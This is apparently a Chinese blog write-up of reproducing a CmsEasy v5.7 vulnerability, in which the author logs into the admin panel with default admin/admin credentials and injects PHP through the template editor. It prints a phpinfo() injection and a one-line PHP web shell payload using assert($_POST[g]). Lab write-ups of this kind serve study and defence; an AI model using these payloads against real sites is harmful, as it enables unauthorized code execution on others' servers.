【Web】CmsEasy 漏洞复现

访问主页

到处点一点没啥发现

扫目录

访问/admin

账号密码都是admin admin,不知道为什么,这里就先当作是默认吧

(其实都是信息检索,能在网上搜到就行hhh)

登录成功

看到左边列表有模板,心里大概有数了哈

进行一波历史漏洞的查

CmsEasy_v5.7 漏洞测试

payload1:

复制代码
1111111111";}<?php phpinfo()?>

payload2:

复制代码
11";}<?php assert($_POST[g]);?>

然而蚁剑连不上

在页面里post传g=phpinfo();可以执行

但p=system('xxx');却不能执行(没有disable_functions)

挺奇怪的,可能不是linux系统?

相关推荐
pps-key1 天前
map高级使用手记:从端口扫描到漏洞验证
学习·计算机网络·安全·网络安全·网络攻击模型
萤丰信息1 天前
数智赋能:智慧园区重构产业运营新范式
大数据·人工智能·科技·安全·智慧园区
sg_knight1 天前
如何通过 CSS 实现走马灯效果(纯前端实现)
前端·javascript·css·vue·web·走马灯
Aliex_git1 天前
性能优化 - 构建效率优化
前端·笔记·webpack·性能优化·vue·团队开发
曲幽1 天前
从本地到云端:深入理解WSGI,让你的Python Web应用稳健部署
python·nginx·flask·fastapi·web·gunicorn·uvicorn·diango·waitress
飞函安全1 天前
企业如何实现统一工作门户?解决信息孤岛的一站式方案
安全·信息可视化·信息与通信
熊文豪1 天前
电科金仓KingbaseES数据库用户管理与权限控制安全实践指南
数据库·安全·kingbasees·金仓数据库·电科金仓
合新通信 | 让光不负所托1 天前
【合新通信】LWDM RFOF射频光模块
安全·信息与通信
章鱼丸仔1 天前
Redis学习笔记
redis·笔记·学习
程序员龙语1 天前
CSS 定位、层级与常用交互效果实战笔记
css·笔记·交互